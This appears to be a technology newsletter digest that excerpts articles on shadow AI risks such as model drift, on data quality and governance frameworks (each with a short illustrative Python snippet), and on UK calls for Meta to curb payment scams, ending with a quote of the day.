Functional risks stem from an AI tool's ability to function properly. For example, model drift is a functional risk. It occurs when the AI model falls out of alignment with the problem space it was trained to address, rendering it useless and potentially misleading. Model drift might happen because of changes in the technical environment or outdated training data. ... Operational risks endanger the company's ability to do business. Operational risks come in many forms. For example, a shadow AI tool could give bad advice to the business because it is suffering from model drift, was inadequately trained or is hallucinating -- i.e., generating false information. Following bad advice from GenAI can result in wasted investments -- for example, if the business expands unwisely -- and higher opportunity costs -- for example, if it fails to invest where it should. ... Legal risks follow functional and operational risks if shadow AI exposes the company to lawsuits or fines. Say the model advises leadership on business strategy. But the information is incorrect, and the company wastes a huge amount of money doing the wrong thing. Shareholders might sue.
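
Model drift, the first functional risk named above, is often caught by comparing the distribution of live inputs against the training distribution. The sketch below uses a two-sample Kolmogorov-Smirnov test from SciPy on a single synthetic feature, with the alert threshold invented for illustration:

```python
import numpy as np
from scipy.stats import ks_2samp

rng = np.random.default_rng(42)
training_feature = rng.normal(loc=100.0, scale=15.0, size=5000)
live_feature = rng.normal(loc=115.0, scale=15.0, size=1000)  # the world shifted

# Two-sample KS test: a small p-value means the distributions differ.
stat, p_value = ks_2samp(training_feature, live_feature)
if p_value < 0.01:   # illustrative threshold
    print(f"possible drift: KS={stat:.3f}, p={p_value:.2e} -- retrain or review")
else:
    print("live inputs still look like the training data")
```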


Creating a Data Quality Framework

A start-up business may not initially have a need for organizing massive amounts of data (it doesn’t yet have massive amounts of data to organize), but a master data management (MDM) program at the start can be remarkably useful. Master data is the critical information needed for doing business accurately and efficiently. For example, the business’s master data contains, among other things, the correct addresses of the start-up’s new customers. Master data must be accurate to be useful – the use of inaccurate master data would be self-destructive. If the organization is doing business internationally, it may need to invest in a Data Governance (DG) program to deal with international laws and regulations. Additionally, a Data Governance program will manage the availability, integrity, and security of the business’s data. An effective DG program ensures that data is consistent and trustworthy and doesn’t get misused. A well-designed DG program includes not only useful software, but policies and procedures for humans handling the organization’s data. A Data Quality framework is normally developed and used when an organization has begun using data in complicated ways for research purposes. 
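
In practice, a data quality framework usually starts life as a handful of executable checks run against each dataset. Here is a minimal pandas sketch covering completeness, uniqueness, and validity on an invented customer table:

```python
import pandas as pd

customers = pd.DataFrame({
    "customer_id": [1, 2, 2, 4],
    "email": ["a@x.com", None, "c@x.com", "not-an-email"],
    "country": ["DE", "FR", "FR", "US"],
})

checks = {
    # Completeness: no missing emails in the master record.
    "email_complete": customers["email"].notna().all(),
    # Uniqueness: customer_id is the master key and must not repeat.
    "id_unique": customers["customer_id"].is_unique,
    # Validity: a crude structural test; real frameworks use stricter rules.
    "email_valid": customers["email"].dropna()
                      .str.contains(r"^[^@]+@[^@]+\.[^@]+$").all(),
}

for name, passed in checks.items():
    print(f"{name}: {'PASS' if passed else 'FAIL'}")
```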


Meta Is Being Urged to Crack Down on UK Payment Scams

Since social media marketplace platforms such as Facebook Marketplace do not have dedicated payment portals that accept payment cards, Davis said, standard security practices adopted by card issuers cannot be used to protect customers. As a result, preventing fraud on social media platforms is a challenge, he said. "To tackle this, we need greater action from Meta to stop fraudulent ads from being put in front of the U.K. consumers," Davis said. Meta Public Policy Head Philip Milton, who testified before the committee, said his company takes fraud prevention "extremely seriously." Milton said Meta has adopted measures such as verifying ads on its platforms and permitting only financial ads that have cleared the U.K. Financial Services Verification process rolled out by the British Financial Conduct Authority. "A good indicator of fraud is fake accounts, as scammers generally tend to use fake accounts to carry out scams. As fraud prevention, Meta removed 827 million fake accounts in the third quarter of 2023," Milton said. Microsoft Government Affairs Director Simon Staffell said the computing giant pursues criminal infrastructure disruption as one of its fraud prevention strategies.



Quote for the day:

"If you are willing to do more than you are paid to do, eventually you will be paid to do more than you do." -- Anonymous